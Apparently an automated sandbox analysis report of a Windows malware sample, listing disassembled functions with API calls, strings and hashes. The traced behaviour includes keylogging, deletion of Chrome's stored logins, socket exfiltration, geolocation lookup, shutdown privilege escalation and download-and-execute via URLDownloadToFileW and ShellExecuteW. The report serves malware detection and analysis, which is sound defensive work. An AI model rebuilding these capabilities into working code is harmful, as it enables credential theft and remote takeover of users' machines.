Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
InternetCloseHandle.WININET(00000000), ref: 00419407
InternetCloseHandle.WININET(00000000), ref: 0041940A

Strings

http://geoplugin.net/json.gp, xrefs: 004193A2

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9

Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
GetLastError.KERNEL32 ref: 0040A999

Strings

UserProfile, xrefs: 0040A95F
[Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
[Chrome StoredLogins not found], xrefs: 0040A9B3

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF

Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
GetLastError.KERNEL32 ref: 00415CDB

Strings

SeShutdownPrivilege, xrefs: 00415CB0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5

Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408393

Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

__CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC

Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
Part of subcall function 00404E06: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C

FindClose.KERNEL32(00000000), ref: 004086F4

Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98

Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040949C
GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
GetKeyboardLayout.USER32(00000000), ref: 004094AE
GetKeyState.USER32(00000010), ref: 004094B8
GetKeyboardState.USER32(?), ref: 004094C5
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9

Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

Strings

`'G, xrefs: 00417DE4
H"G, xrefs: 00417BA1
`'G, xrefs: 00417C7E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: H"G$`'G$`'G
API String ID: 341183262-2774397156
Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A

Function 0044EEB8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
_wcschr.LIBVCRUNTIME ref: 0044F02A
_wcschr.LIBVCRUNTIME ref: 0044F038
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB

Strings

e]j[/, xrefs: 0044F092

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: e]j[/
API String ID: 4212172061-424226671
Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769

Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB

ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
GetProcAddress.KERNEL32(00000000), ref: 00414E72

Strings

SetSuspendState, xrefs: 00414E61
PowrProf.dll, xrefs: 00414E66

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
Opcode Fuzzy Hash: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE

Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
GetACP.KERNEL32 ref: 0044F6F3

Strings

ACP, xrefs: 0044F63A
OCP, xrefs: 0044F670

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398

Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
wsprintfW.USER32 ref: 0040A13F

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A0C7
], xrefs: 0040A0CC
Offline Keylogger Started, xrefs: 0040A0B7

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9

Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE

Strings

SETTINGS, xrefs: 00419497

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19

Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004087A5
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
FindNextFileW.KERNEL32(00000000,?), ref: 00408846
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98

Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040784D
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
__CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99

Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
CloseHandle.KERNEL32(00000000), ref: 0040E4EF

Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 1735047541-0
Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A

Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

A%E, xrefs: 00443B68, 00443952, 004437E1
A%E, xrefs: 0044371D, 004438C8, 00443AEC, 00443A86, 00443916, 004438A4

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: A%E$A%E
API String ID: 0-137320553
Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84

Function 0044F2A3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408

Strings

e]j[/, xrefs: 0044F2AE

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID: e]j[/
API String ID: 2829624132-424226671
Opcode ID: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
Opcode Fuzzy Hash: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58

Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861

Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1

Strings

WallpaperStyle, xrefs: 0041A7AC, 0041A7DF, 0041A82F
Control Panel\Desktop, xrefs: 0041A7A7, 0041A7DA, 0041A82A
TileWallpaper, xrefs: 0041A84B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF

Function 004398AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004399A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB

Strings

e]j[/, xrefs: 004398B7

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: e]j[/
API String ID: 3906539128-424226671
Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48

Function 004468DC Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004468EC

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

GetTimeZoneInformation.KERNEL32 ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A

Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6

Strings

open, xrefs: 004064CC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: open
API String ID: 2825088817-2758837156
Opcode ID: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
